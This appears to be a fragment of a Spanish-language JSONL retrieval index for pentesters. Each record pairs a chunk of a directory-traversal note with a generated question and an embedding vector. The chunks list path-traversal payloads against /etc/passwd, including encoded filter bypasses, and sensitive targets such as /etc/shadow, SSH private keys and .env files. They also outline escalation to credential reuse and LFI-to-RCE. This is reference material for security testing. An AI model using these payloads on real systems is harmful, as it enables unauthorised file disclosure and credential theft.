0.02561, -0.02057, 0.01466, -0.10713, -0.06441, 0.02923, -0.02454, 0.01423, -0.05431, 0.1435, 0.11356, -0.01286, 0.00131, 0.0591, -0.0643, 0.03001, 0.06064, 0.03941, -0.07863, 0.04881, 0.00219, -0.03962, 0.10242, 0.06527, 0.12063, 0.10029, -0.09075, 0.0495, -0.04083, -0.03116, 0.03688, -0.02923, 0.02252, -0.05647, -0.0568, -0.07517, -0.06239, 0.01415, 0.00737, -0.06789, -0.0324, 0.03507, 0.00063, 0.02458, -0.0451, 0.01656, 0.03323, -0.01885, -0.01492, -0.08444, 0.0517, -0.13571, 0.00199, -0.05709, -0.00414, 0.08238, -0.03605, -0.05911, -0.01219, 0.10817, 0.04625, -0.02527, 0.04587, 0.05158, -0.04038, 0.06676, -0.10502, -0.09983, -0.03044, 0.01628, -0.10133, -0.03382, 0.03003, -0.09814, -0.01466, 0.0103, -0.10338, -0.03737, 0.08856, -0.00113, 0.04879, -0.03988, 0.06125, -0.0714, -0.03537, -0.04319, 0.00628, 0.03326, -0.04223, -0.02074, -0.03279, -0.01474, -0.08255, -0.0288, -0.03789, -0.0408, -0.07544, 0.02452, -0.01232, -0.08361, -0.02297, -0.00149, 0.00481, -0.07245, -0.02641, 0.01315, -0.02155, 0.00938, 0.05874, 0.01114, 0.01401, -0.07156, 0.03343, -0.03173, -0.03154, -0.09456, -0.02319, 0.00324, -0.02253, 0.0047, -0.0322, -0.00091, -0.02536, 0.00571, -0.00478, -0.05608, 0.01175, -0.01385, 0.01585, 0.02669, -0.03561, 0.07497, -0.06585, -0.01523, -0.00219, 0.03405, -0.00273, -0.01676, -0.04561, 0.04232, 0.04159, 0.02722, 0.02653, 0.02471, -0.0039, 0.0249, -0.01125, 0.06009, 0.00238, -0.04357, 0.07499, -0.0244, 0.05761, 0.06838, 0.01235, -0.00053, -0.01015, -0.04643, -0.08241, 0.05053, 0.04709, -0.01454, -0.06258, -0.00563, -0.03647, -0.06828, 0.01696, -0.00413, -0.0595, -0.01141, -0.0379, 0.02009, 0.00297, 0.06325, -0.01674]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Payloads\n```\n../../../../etc/passwd\n....//....//....//etc/passwd (bypass de filtro que quita \"../\")\n%2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode)\n%252e%252e%252f (doble URL-encode)\n/etc/passwd (ruta absoluta directa)\n..%c0%af..%c0%af (UTF-8 overlong)\n```", "indexar": "como puedo usar una ruta absoluta directa si me bloquean los caracteres raros en la URL?", "v": [-0.00112, -0.09179, -0.19892, -0.07952, -0.09921, -0.02284, 0.04129, -0.06187, -0.00581, -0.08033, -0.07947, -0.24225, 0.08422, 0.02264, 0.10549, -0.13926, -0.09207, 0.11292, -0.01962, -0.16092, 0.01895, -0.31108, 0.0043, 0.04521, -0.09155, -0.05073, 0.04098, 0.03865, -0.063, -0.08721, 0.01625, 0.03306, 0.07879, -0.07807, -0.07364, 0.02606, 0.07348, 0.0792, 0.08915, 0.0692, -0.01275, -0.00065, -0.10204, 0.02472, -0.04645, 0.04772, 0.02706, -0.02462, -0.05989, -0.08065, 0.01705, -0.11956, -0.17552, 0.04877, 5e-05, -0.03526, 0.17004, 0.02312, -0.07532, 0.07972, -0.05567, 0.00371, -0.00012, 0.02288, 0.01983, -0.02543, 0.01109, -0.06456, -0.12203, -0.01828, 0.01459, 0.05029, 0.04311, 0.05069, 0.11418, 0.06142, -0.06938, 0.05486, 0.05745, 0.07969, -0.00092, 0.03168, -0.00243, -0.03963, 0.04488, 0.02695, 0.04367, -0.0652, -0.0299, 0.00427, 0.03931, 0.01748, -0.00527, -0.07197, -0.04721, -0.02666, -0.00937, 0.11313, 0.02239, -0.08431, -0.01654, 0.02014, -0.02542, 0.15658, 0.11461, -0.02305, -0.01005, -0.05661, -0.02022, 0.03486, -0.00866, 0.01389, -0.12681, -0.13979, -0.06722, 0.01098, -0.04366, -0.07084, -0.04989, -0.12262, -0.08378, -0.03847, -0.09676, -0.00056, 0.03987, 0.05066, -0.07649, 0.02529, -0.00269, -0.00619, -0.07822, 0.0907, -0.06005, -0.09777, -0.08646, -0.00781, 0.03429, 0.01065, 0.01127, -0.00564, 0.0324, 0.02062, -0.10244, -0.00126, 0.02738, -0.01321, -0.07584, -0.08986, -0.06631, 0.01526, 0.05587, -0.0008, -0.02576, 0.0444, -0.03821, -0.00295, 0.02599, -0.0324, 0.03566, 0.04293, -0.01778, 0.03901, -0.05972, 0.06502, -0.02305, -0.05797, -0.08215, -0.01955, -0.0035, -0.05584, -0.01201, 0.06144, 0.0543, -0.06339, -0.02509, -0.05078, -0.01976, 0.02768, 0.02879, 0.04316, -0.03059, 0.00393, -0.00306, -0.04612, -0.03978, 0.04136, 0.0742, 0.02136, -0.00663, 0.01386, -0.03336, 0.01619, 0.04716, -0.00905, -0.01048, 0.05628, 0.01287, 0.04703, -0.04337, -0.02445, 0.00791, 0.03982, -0.05761, -0.05501, 0.05844, 0.01964, -0.06656, -0.01326, 0.03983, 0.04953, 0.06455, -0.03725, 0.04319, -0.01445, -0.03489, -0.00237, -0.02405, -0.00465, -0.02009, -0.02752, 0.01547, 0.08567, 0.01214, 0.04807, 0.08269, -0.02397, -0.03232, -0.06005, -0.05829, 0.05322, -0.01697, 0.02783, -0.02391, 0.03438, 0.06059, 0.03182, -0.03155, 0.04005, -0.04389, 0.01457, -0.01281, 0.03442, -0.01238, -0.03023, -0.05308, -0.0368, -0.06705, 0.02903, -0.05625, -0.03582, 0.00855, 0.02715, 0.06473, -0.02007, -0.0096, 0.0061]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Payloads\n```\n../../../../etc/passwd\n....//....//....//etc/passwd (bypass de filtro que quita \"../\")\n%2e%2e%2f%2e%2e%2fetc%2fpasswd (URL-encode)\n%252e%252e%252f (doble URL-encode)\n/etc/passwd (ruta absoluta directa)\n..%c0%af..%c0%af (UTF-8 overlong)\n```", "indexar": "cual es una alternativa con doble codificacion a la ruta /etc/passwd?", "v": [-0.15326, -0.04325, -0.25326, 0.07102, -0.05565, -0.03909, 0.05365, 0.01087, -0.11061, -0.06692, -0.1521, -0.30673, -0.02218, 0.00082, -0.00011, -0.15402, 0.06479, -0.0095, 0.07093, -0.10344, -0.04359, -0.14526, 0.04041, 0.02347, -0.02043, 0.00821, 0.10095, 0.02508, -0.0465, -0.02945, 0.11776, 0.05641, 0.04876, -0.06278, -0.06286, 0.05088, 0.05947, 0.18223, 0.08997, 0.02861, -0.06606, -0.02989, -0.04258, 0.04453, 0.03649, -0.06283, -0.06937, 0.02856, 0.03368, -0.03243, -0.03944, -0.05423, -0.12472, -0.04263, 0.08775, -0.08896, 0.10609, -0.07426, -0.13406, 0.08511, 0.06307, 0.07671, -0.05843, 0.03542, 0.13745, 0.00135, -0.03699, -0.09883, -0.0901, -0.00687, -0.0215, 0.02639, -0.03288, 0.01118, -0.02171, 0.0062, -0.0121, 0.03079, 0.11209, 0.06077, 0.11675, -0.01103, -0.08016, -0.0322, -0.03811, -0.08685, 0.06814, -0.0582, 0.02673, 0.03436, -0.01556, -0.03787, 0.03072, 0.04581, 0.01017, -0.01339, -0.00912, 0.05317, -0.0098, -0.02156, -0.00767, 0.016, -0.07651, 0.07788, -0.0216, 0.00356, -0.02254, 0.01928, -0.01386, 0.08502, 0.00114, 0.03528, -0.0611, -0.08438, 0.02027, -0.04289, -0.067, -0.04169, 0.00526, -0.04057, -0.05646, 0.01196, -0.10355, -0.02757, 0.01516, 0.05987, -0.02187, 0.05183, -0.02059, 0.04437, 0.02716, 0.02551, -0.06294, -0.09052, -0.08856, -0.07863, 0.04202, -0.02163, 0.01135, 0.02503, 0.01535, 0.0316, -0.05996, 0.00219, 0.04447, 0.05172, 0.03409, -0.12524, -0.06342, 0.05036, -0.16218, 0.02809, 0.0246, 0.08491, 0.00473, 0.03498, -0.00059, 0.03415, -0.05542, 0.11402, -0.05195, -0.03441, -0.04485, -0.00662, -0.00283, -0.07475, -0.01401, -0.10923, -0.0244, -0.16958, -0.0437, 0.00654, 0.01196, -0.03916, 0.08899, -0.09915, -0.04075, -0.0485, 0.05205, -0.02955, 0.00969, -0.02306, 0.0452, 0.04312, -0.01255, -0.03117, 0.03438, 0.0466, 0.01296, 0.04221, 0.00744, -0.00454, -0.00954, -0.05989, -0.0856, -0.00303, 0.05678, -0.05411, -0.01403, 0.0248, 0.02509, 0.00809, 0.01207, -0.03075, 0.01313, 0.03244, -0.01939, -0.02131, -0.00252, 0.10786, 0.03113, -0.02599, 0.05604, -0.01851, -0.08163, 0.03089, -0.02876, 0.02417, -0.0067, -0.0359, 0.0453, 0.05416, -0.03447, 0.05096, 0.05894, -0.00079, -0.03221, 0.05225, -0.04364, 0.04493, -0.04256, -0.00855, 0.03313, 0.02489, 0.02991, 0.05337, -0.05413, -0.03936, -0.03448, -0.06967, 0.06106, 0.03254, 0.01653, -0.02693, -0.01928, 0.03289, -0.04977, -0.02834, 0.00865, -0.04058, -0.03626, 0.01863, -0.01567, 0.04157, 0.02419, -0.02957]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Ficheros jugosos\n```\n/etc/passwd /etc/shadow /etc/hosts\n~/.ssh/id_rsa β†’ login SSH directo\nconfig.php web.config .env β†’ credenciales de BD\n/var/www/html/... β†’ cΓ³digo fuente (busca creds, segundos vectores)\n```", "indexar": "que herramienta sirve para buscar credenciales ocultas en archivos de configuraciΓ³n y contraseΓ±as?", "v": [0.14933, -0.03098, -0.18388, -0.22889, 0.04987, -0.16477, -0.06993, -0.06144, -0.00433, -0.05892, -0.07698, -0.03619, -0.03468, -0.0939, 0.06831, 0.00837, 0.14472, -0.03281, 0.03207, 0.06978, -0.0471, -0.04641, -0.0732, -0.00981, -0.10848, -0.06654, 0.02393, -0.00915, -0.1745, -0.00397, -0.01035, 0.03536, 0.00849, 0.05611, -0.0661, 0.12653, -0.09081, 0.0381, -0.06502, 0.08856, 0.0549, 0.06785, -0.07642, 0.1485, 0.01241, -0.01915, -0.00954, 0.0991, 0.03958, 0.02308, -0.09018, -0.20927, -0.11761, -0.04222, 0.00204, -0.12553, 0.17388, -0.06313, 0.04618, -0.06921, -0.16292, 0.03998, 0.0084, 0.07304, -0.07375, -0.04336, 0.01731, -0.05431, -0.13424, 0.10077, -0.00822, 0.03548, -0.00078, 0.04375, 0.01853, -0.02749, 0.06933, -0.00141, 0.02776, 0.07383, 0.0001, -0.00384, -0.03224, 0.03229, -0.13864, -0.03393, 0.03824, 0.03792, 0.00195, -0.08012, 0.03116, 0.03482, -0.05951, 0.05655, 0.02084, -0.01526, 0.04459, -0.02985, -0.05624, -0.03508, 0.03225, -0.04086, -0.04628, 0.19113, -0.02496, 0.06682, -0.02208, 0.01226, 0.0006, -0.07568, 0.12019, 0.03773, 0.02778, -0.00466, 0.03877, 0.03162, -0.00038, -0.10184, 0.02755, -0.03389, 0.02188, -0.00616, -0.02871, 0.01258, 0.02439, 0.04687, -0.01795, 0.04141, -0.01859, -0.07471, -0.02447, -0.10182, -0.07659, 0.08081, -0.0631, 0.01186, -0.00347, -0.11978, -0.10033, 0.00701, 0.07746, -0.01401, -0.01004, -0.10185, 0.10515, 0.06269, 0.04359, -0.03282, 0.01642, -0.0623, -0.01034, 0.0084, 0.06148, -0.00842, -0.0356, 0.06791, -0.04966, -0.10602, -0.08698, 0.09273, -0.01942, -0.022, -0.04739, 0.01502, -0.0691, -0.06498, 0.03646, 0.02984, 0.06425, 0.01786, 0.05303, 0.00039, 0.00875, -0.0855, -0.01222, 0.00589, 0.00634, -0.07925, 0.05295, -0.07672, 0.01548, -0.04507, -0.00531, 0.00036, 0.04607, -0.03652, 0.10016, -0.02099, -0.05105, -0.02761, 0.04235, -0.05158, -0.01212, 0.0333, -0.00589, 0.00099, 0.00877, -0.03399, -0.02299, -0.06879, -0.00995, 0.00498, -0.04439, -0.04553, 0.02561, 0.04922, -0.04446, -0.03625, -0.01594, 0.03082, 0.05356, -0.01341, 0.04227, -0.08278, -0.05572, -0.06329, -0.02075, 0.02632, -0.01407, -0.02855, 0.02758, 0.00664, 0.03907, 0.03551, 0.03157, -0.0011, -0.027, 0.0146, 0.01912, -0.03785, 0.00828, 0.02937, -0.05194, 0.03269, 0.07263, -0.04381, -0.00898, -0.00715, -0.02972, -0.02936, -0.05038, 0.03048, 0.05534, -0.05492, -0.07049, -0.04385, -0.02359, 0.00947, 0.02562, -0.03336, -0.05152, 0.04087, 0.02743, -0.02256, 0.04702, -0.04959]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Ficheros jugosos\n```\n/etc/passwd /etc/shadow /etc/hosts\n~/.ssh/id_rsa β†’ login SSH directo\nconfig.php web.config .env β†’ credenciales de BD\n/var/www/html/... β†’ cΓ³digo fuente (busca creds, segundos vectores)\n```", "indexar": "cual programa me ayuda a detectar fugas de informaciΓ³n en el cΓ³digo fuente y los archivos del servidor?", "v": [0.04039, 0.02113, -0.12924, -0.2302, -0.00221, -0.15029, 0.05361, -0.01912, -0.0752, -0.02691, -0.13566, -0.07162, -0.07431, -0.02721, 0.03762, -0.09507, 0.18802, -0.11281, 0.05751, -0.08911, -0.02403, -0.00796, -0.01886, -0.09584, -0.1818, -0.02247, 0.01653, -0.00262, -0.06862, -0.14673, 0.06517, -0.06962, 0.14762, 0.06805, -0.10886, 0.08706, 0.07447, 0.06519, -0.0722, 0.05954, -0.01278, 0.03766, -0.07658, -0.01546, 0.04774, -0.11774, -0.03082, -0.04593, 0.10787, -0.04231, -0.06443, -0.09534, -0.11688, 0.00083, -0.09254, -0.08962, 0.03912, -0.16344, -0.00326, -0.00143, -0.06533, -0.01233, 0.00249, -0.11825, 0.046, 0.03368, 0.0669, -0.02004, -0.09422, -0.08576, -0.01964, 0.04068, -0.00758, -0.04635, -0.02516, 0.03774, 0.02585, -0.10303, 0.06167, 0.02076, 0.00769, 0.0414, 0.01695, 0.08422, -0.0521, -0.06237, 0.02515, -0.00586, -0.01044, -0.08961, 0.07528, 0.0482, 0.00186, 0.10857, 0.04606, 0.01561, 0.1469, 0.02457, 0.04244, 0.03787, -0.01853, -0.06326, -0.00458, 0.09921, 0.11606, 0.10458, 0.06699, -0.06354, -0.07033, -0.01937, -0.05615, -0.00996, -0.00752, -0.00171, -0.1203, -0.01091, 0.04659, -0.03355, 0.00976, 0.00569, -0.13432, 0.01127, -0.0729, 0.05736, 0.04602, 0.01509, 0.0408, 0.04139, 0.02812, -0.02418, -0.05881, 0.01995, -0.04527, -0.00815, 0.00777, 0.00531, 0.05524, 0.03136, -0.07115, -0.01302, 0.02978, 0.01921, 0.05032, 0.11631, 0.11065, -0.00139, 0.02156, -0.11376, -0.08236, -0.0104, -0.02685, 0.02745, -0.04519, -0.01204, -0.11076, 0.01549, 0.02584, -0.06505, -0.11373, 0.00667, -0.01712, 0.01568, -0.00905, -0.04674, 0.03507, -0.06333, 0.05945, 0.05314, 0.08032, 0.01236, -0.00664, 0.04092, -0.01349, -0.0813, -0.0152, -0.04169, -0.01197, -0.11669, -0.0048, -0.02156, -0.08877, 0.04949, 0.02277, -0.01018, -0.02523, -0.04162, 0.02535, -0.01188, -0.00427, -0.00539, 0.05859, 0.00135, -0.06279, 0.02055, -0.03243, -0.04539, 0.01402, -0.03258, 0.06185, -0.07851, -0.07207, 0.03724, -0.00244, -0.03955, 0.03571, 0.05189, -0.07008, -0.01533, 0.001, 0.03894, 0.07656, -0.00521, 0.09804, -0.03888, -0.06845, -0.01899, 0.01782, 0.01767, 0.06495, -0.01939, -0.02004, -0.00818, 0.0493, 0.03358, -0.01823, -0.03833, 0.04827, 0.02031, 0.01592, 0.01328, -0.05063, -0.0144, -0.02851, -0.02581, 0.03891, -0.00052, 0.00095, -0.04101, -0.02113, -0.1305, 0.02311, 0.0772, -0.00633, -0.07156, 0.02265, -0.01969, -0.04738, -0.02335, -0.00834, -0.02476, -0.02552, 0.0292, 0.05201, -0.03183, 0.11394, -0.02725]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Ficheros jugosos\n```\n/etc/passwd /etc/shadow /etc/hosts\n~/.ssh/id_rsa β†’ login SSH directo\nconfig.php web.config .env β†’ credenciales de BD\n/var/www/html/... β†’ cΓ³digo fuente (busca creds, segundos vectores)\n```", "indexar": "con que puedo escanear mis sistemas buscando contraseΓ±as guardadas maliciosamente o en rutas sensibles?", "v": [0.05975, -0.00192, -0.0626, -0.10088, -0.02788, -0.08385, -0.09265, -0.17668, -0.09099, -0.02137, -0.08349, 0.01328, 0.0328, -0.00111, 0.0817, 0.01858, 0.07124, 0.16638, 0.05176, 0.0303, -0.01204, -0.18336, 0.07114, -0.051, -0.06912, -0.0588, 0.03715, -0.09179, -0.12595, 0.00432, -0.00863, 0.11125, 0.04406, -0.01027, -0.10202, 0.08791, -0.07532, 0.05503, 0.02511, 0.00405, 0.07289, -0.00369, -0.15101, -0.02001, 0.01718, -0.10612, -0.07766, 0.03341, 0.03662, -0.03243, -0.15634, -0.09361, -0.17065, -0.00391, 0.12098, -0.11757, 0.0947, 0.05778, 0.08641, 0.01703, -0.09334, 0.12731, 0.10667, 0.0772, 0.0074, -0.04663, 0.1061, 0.00588, -0.08864, 0.03412, -0.04778, 0.02255, -0.06116, 0.04305, 0.04034, 0.02902, 0.03131, 0.11524, 0.07262, 0.1432, -0.01049, -0.03435, -0.06336, 0.03842, -0.05306, -0.05093, 0.02765, -0.03706, -0.00609, -0.01038, 0.0694, -0.04599, -0.03617, 0.0847, -0.04103, 0.00688, -0.00236, 0.03808, -0.03693, -0.03859, -0.06444, -0.0634, -0.07865, 0.12514, -0.0529, 0.01168, 0.03062, 0.00119, 0.10152, -0.06693, 0.02271, 0.00807, -0.03537, -0.09973, -0.06253, -0.0026, -0.04264, -0.09886, 0.02118, -0.01403, -0.01232, -0.07412, -0.01947, 0.02417, 0.09196, 0.03803, -0.01143, 0.01998, 0.00632, -0.03172, -0.03587, -0.0225, -0.09561, -0.00902, -0.05333, 0.03288, 0.00906, -0.05293, -0.03052, -0.03304, -0.05503, 0.01358, 0.00131, -0.02623, 0.06981, 0.14856, 0.05214, -0.09412, -0.04724, -0.0913, -0.01659, 0.02316, -0.00773, 0.08316, -0.00248, 0.06646, 0.07084, -0.11021, -0.07751, 0.12629, -0.03764, 0.01582, -0.08187, -0.03818, -0.07474, -0.10323, -0.01835, 0.00773, 0.05837, -0.03169, -0.03694, 0.0769, -0.01702, -0.05037, 0.05157, -0.03518, -0.05348, -0.10019, 0.10368, -0.03972, -0.03664, -0.01856, 0.00682, 0.00949, 0.00687, -0.07015, 0.05715, -0.00534, -0.02421, 0.00828, 0.10958, -0.00095, -0.02675, 0.03576, -0.03043, -0.01519, -0.00556, -0.03015, -0.04059, -0.01625, -0.00674, 0.0426, -0.00653, -0.05325, 0.0217, 0.05431, -0.04712, -0.03664, 0.00677, 0.03874, 0.02639, -0.00345, 0.01708, -0.06217, -0.09993, -0.00955, 0.01439, 0.04986, -0.04394, -0.01639, 0.05733, 0.05591, 0.09118, 0.0649, 0.0127, 0.00487, -0.03038, 0.03457, 0.01564, -0.02155, -0.03201, -0.01743, -0.06373, -0.01106, 0.07551, -0.00085, -0.02883, -0.064, -0.03296, -0.0329, 0.01068, 0.10272, 0.00067, -0.07624, -0.08205, -0.06487, -0.05878, 0.00202, 0.03183, -0.04325, 0.00733, 0.05806, 0.02189, -0.05382, 0.0539, -0.10184]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Siguiente paso\n- Lees `id_rsa` β†’ SSH como ese usuario.\n- Lees cΓ³digo/config β†’ credenciales β†’ Authentication attacks / reutilizaciΓ³n.\n- Si ademΓ‘s se **incluye** (PHP) β†’ escala a LFI a RCE.\n\nRelacionado: LFI a RCE Β· Burp Repeater e Intruder Β· OSCP MOC", "indexar": "que herramienta me sirve para hacer ataques de reutilizaciΓ³n de credenciales?", "v": [-0.12422, -0.004, -0.27253, -0.11366, 0.16563, -0.09725, -0.04361, 0.05741, 0.07469, 0.0133, -0.0806, -0.06412, 0.04721, -0.11843, 0.14368, 0.03725, -0.03175, -0.02006, 0.11069, -0.02689, 0.00871, -0.03863, -0.08584, 0.06882, -0.12013, 0.03264, 0.02905, -0.00788, -0.10189, -0.00117, 0.0463, 0.05119, -0.05154, -0.08127, -0.0722, -0.02157, -0.03711, 0.08736, 0.02794, 0.13924, -0.09209, 0.01774, -0.17317, -0.0072, 0.11301, 0.02188, -0.0186, 0.02779, -0.02341, 0.11854, -0.00881, -0.12714, -0.15601, -0.09277, -0.0129, -0.09016, 0.09248, -0.14614, 1e-05, -0.19112, -0.15215, 0.06163, 0.01485, -0.07752, 0.05271, -0.08337, -0.03221, -0.07522, -0.08356, 0.07143, -0.03932, 0.00474, 0.017, -0.00948, -0.03038, -0.06657, 0.06387, 0.07379, 0.06656, -0.03015, 0.07552, 0.00425, -0.06715, -0.03937, -0.03005, -0.02007, 0.02639, -0.07116, -0.03814, -0.07794, 0.00054, 0.04594, -0.05261, -0.06365, 0.00684, 0.03536, 0.01511, -0.10466, -0.03607, -0.02169, 0.10438, -0.11449, -0.05855, 0.01254, -0.00175, -0.00572, -0.01235, 0.00876, -0.05693, -0.08876, 0.03861, 0.01319, -0.01919, -0.05004, 0.03201, 0.08868, -0.03662, -0.00686, 0.03683, -0.03272, -0.00386, -0.04342, -0.0569, 0.00113, -0.04818, 0.06165, -0.09775, 0.0291, -0.0491, -0.12349, -0.04215, -0.02467, -0.02484, 0.06419, -0.00282, -0.02666, 0.02693, -0.18078, -0.03859, -0.02572, 0.06294, 0.1083, -0.02895, -0.05358, -0.0155, 0.04171, 0.03846, -0.06789, -0.00494, -0.0309, 0.08541, 0.01301, 0.05096, 0.0447, -0.06433, -0.00698, -0.00072, 0.00599, -0.06374, 0.08528, -0.03468, -0.03845, 0.03769, 0.06586, -0.03127, -0.04702, 0.03595, 0.01505, 0.07573, 0.11479, 0.04225, 0.02488, 0.04838, -0.06186, 0.04898, -0.03219, -0.05047, -0.01063, -0.03535, -0.10256, 0.00785, -0.05668, -0.05411, 0.00779, 0.06687, -0.03131, 0.05797, 0.00611, 0.00229, 0.01337, -0.01444, -0.02455, 0.02338, -0.00174, 0.0546, -0.03401, -0.02274, -0.05783, -0.01835, 0.00157, -0.00529, -0.04754, -0.03788, -0.04575, 0.04257, 0.11816, 0.01738, -0.05923, -0.00234, 0.05226, 0.037, 0.00024, 0.07706, -0.04034, -0.04063, -0.06345, 0.01887, 0.01018, -0.02815, -0.0334, 0.05914, -0.03224, -0.02452, 0.03538, -0.0284, -0.01284, -0.02207, -0.06494, -0.0062, 0.01318, 0.02922, -0.03066, -0.02199, -0.02947, -0.01115, -0.10187, 0.01596, 0.00601, -0.06217, -0.02214, -0.04479, -0.02028, 0.02465, -0.01119, -0.0746, -0.03993, -0.0221, -0.04208, -0.01815, -0.03603, -0.01512, -0.01035, 0.04937, -0.01523, 0.01821, 0.00795]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Siguiente paso\n- Lees `id_rsa` β†’ SSH como ese usuario.\n- Lees cΓ³digo/config β†’ credenciales β†’ Authentication attacks / reutilizaciΓ³n.\n- Si ademΓ‘s se **incluye** (PHP) β†’ escala a LFI a RCE.\n\nRelacionado: LFI a RCE Β· Burp Repeater e Intruder Β· OSCP MOC", "indexar": "cual es una alternativa libre a las herramientas de inyecciΓ³n para escalar vulnerabilidades?", "v": [0.23524, 0.07528, -0.19808, -0.03765, -0.0066, -0.01762, -0.1046, -0.06708, -0.02756, -0.05528, -0.00123, -0.15405, -0.08583, 0.04037, 0.11461, 0.01479, -0.00712, -0.10188, 0.02422, 0.04753, -0.06332, 0.00063, -0.09399, -0.11825, -0.08743, -0.02542, -0.09768, 0.02158, -0.10481, -0.05304, -0.02103, 0.0602, 0.05688, -0.03951, 0.04617, 0.01027, 0.02063, 0.0424, 0.12076, -0.04766, -0.05775, 0.03143, -0.05765, -0.01365, 0.0371, -0.03176, -0.05699, 0.04863, 0.06167, 0.0615, -0.05261, -0.05587, -0.0188, -0.11179, 0.03978, -0.01541, 0.27029, -0.06104, -0.00663, -0.07299, -0.11172, 0.0754, 0.01829, -0.04489, -0.02294, -0.03736, -0.12148, -0.0634, -0.16043, 0.13796, -0.01473, -0.04859, 0.03673, -5e-05, -0.04832, 0.02751, -0.01618, 0.00268, -0.0063, 0.02841, 0.01547, -0.02851, 0.01214, 0.12025, -0.0891, -0.09242, 0.16084, -0.06914, 0.09989, 0.00715, 0.11946, -0.03577, -0.02571, 0.0027, -0.00206, -0.02733, 0.08577, 0.01857, -0.03674, 0.07023, -0.03124, -0.04861, -0.037, 0.05284, 0.03164, 0.0454, -0.07698, 0.00361, -0.07096, 0.00532, 0.03692, 0.09443, -0.00261, -0.01767, -0.07832, -0.03002, -0.07327, -0.01406, -0.03499, -0.07541, -0.01658, -0.05938, -0.04414, -0.02419, -0.01315, -0.0287, -0.04905, -0.00311, -0.0219, -0.04657, 0.01966, -0.00257, 0.01967, -0.001, -0.06097, 0.00371, 0.07495, -0.11925, 0.00822, -0.04944, 0.06156, 0.06347, 0.00984, -0.05891, 0.05545, 0.05405, -0.02367, -0.09612, -0.01481, -0.02816, -0.06091, 0.04443, 0.02213, 0.18476, 0.02467, -0.05233, -0.05061, -0.04486, -0.09594, 0.14104, 0.02141, 0.0243, -0.01798, 0.09456, -0.0071, -0.01896, 0.05187, 0.02608, -0.04134, 0.01268, 0.05222, 0.06245, 0.07517, 0.00311, 0.07892, -0.08134, -0.01732, -0.08302, 0.03613, -0.04103, 0.02035, -0.01233, -0.04581, -0.02819, 0.00274, -0.0363, -0.01159, 0.02079, 0.06287, 0.07044, -0.08827, -0.03507, -0.07627, -0.08241, 0.02707, -0.04384, 0.02128, -0.00934, -0.01458, -0.01456, -0.04, -0.02307, -0.0433, -0.08643, 0.02423, -0.00327, -0.03336, -0.0085, -0.02433, 0.09663, 0.06655, 0.01087, 0.10455, -0.01241, -0.02699, -0.06394, 0.02864, 0.04614, -0.03477, -0.05954, 0.00375, 0.05683, 0.086, -0.03034, -0.0142, 0.00438, -0.05412, 0.02247, -0.04975, 0.04804, -0.02051, -0.01995, -0.05466, 0.02528, 0.04421, 0.00691, 0.02307, 0.0735, -0.01317, -0.02844, 0.04226, 0.06861, 0.00022, -0.01416, -0.06713, -0.03432, -0.04934, -0.00214, -0.03397, -0.07275, -0.04482, 0.05874, 0.03556, -0.02051, 0.04082, -0.06508]} -{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Siguiente paso\n- Lees `id_rsa` β†’ SSH como ese usuario.\n- Lees cΓ³digo/config β†’ credenciales β†’ Authentication attacks / reutilizaciΓ³n.\n- Si ademΓ‘s se **incluye** (PHP) β†’ escala a LFI a RCE.\n\nRelacionado: LFI a RCE Β· Burp Repeater e Intruder Β· OSCP MOC", "indexar": "con que puedo montar un ataque de LFI a RCE en PHP?", "v": [-0.1041, 0.02032, -0.14865, -0.07734, -0.10354, -0.00297, 0.05577, -0.00421, -0.13539, 0.01325, 0.03226, 0.00409, 0.03169, -0.07029, 0.12471, 0.03587, -0.14156, 0.03105, -0.02195, -0.15949, -0.0844, -0.05282, -0.0966, -0.08606, 0.03787, 0.12065, 0.04625, 0.00655, -0.059, -0.19401, 0.17043, 0.07025, -0.01537, 0.18125, 0.00561, -0.09675, 0.02375, -0.01572, 0.04079, 0.10915, 0.02487, -0.01779, -0.18514, 0.10299, 0.06342, 0.01098, 0.04826, -0.05288, 0.20424, 0.0147, 0.17306, -0.00036, -0.15077, -0.01803, -0.02371, 0.02647, 0.00565, -0.08756, 0.05641, 0.05462, -0.05577, 0.04317, -0.04314, -0.13997, 0.08319, 0.1258, 0.07376, -0.00861, -0.06985, -0.01699, -0.05533, -0.04047, -0.15548, -0.0484, -0.00023, 0.05183, 0.05899, 0.03252, 0.02924, -0.01965, -0.06402, -0.00588, -0.03921, 0.01909, -0.04303, -0.03513, 0.04672, -0.12656, -0.00923, 0.03477, 0.0553, 0.08381, -0.04125, -0.03571, -0.0972, -0.05102, 0.04103, -0.04732, -0.06578, -0.09773, -0.1087, -0.00412, 0.03942, 0.06642, 0.10327, -0.07454, 0.07937, 0.02415, 0.05887, -0.10495, 0.00026, -0.04127, -0.14927, -0.02257, -0.05099, -0.05456, 0.01097, 0.02346, -0.0591, -0.04691, -0.03578, 0.00767, -0.06788, 0.02406, 0.04972, 0.02247, 0.04989, 0.00431, -0.09652, -0.03883, -0.04689, -0.04756, 0.07562, -0.06989, -0.00513, 0.07865, 0.04899, -0.03359, -0.05608, 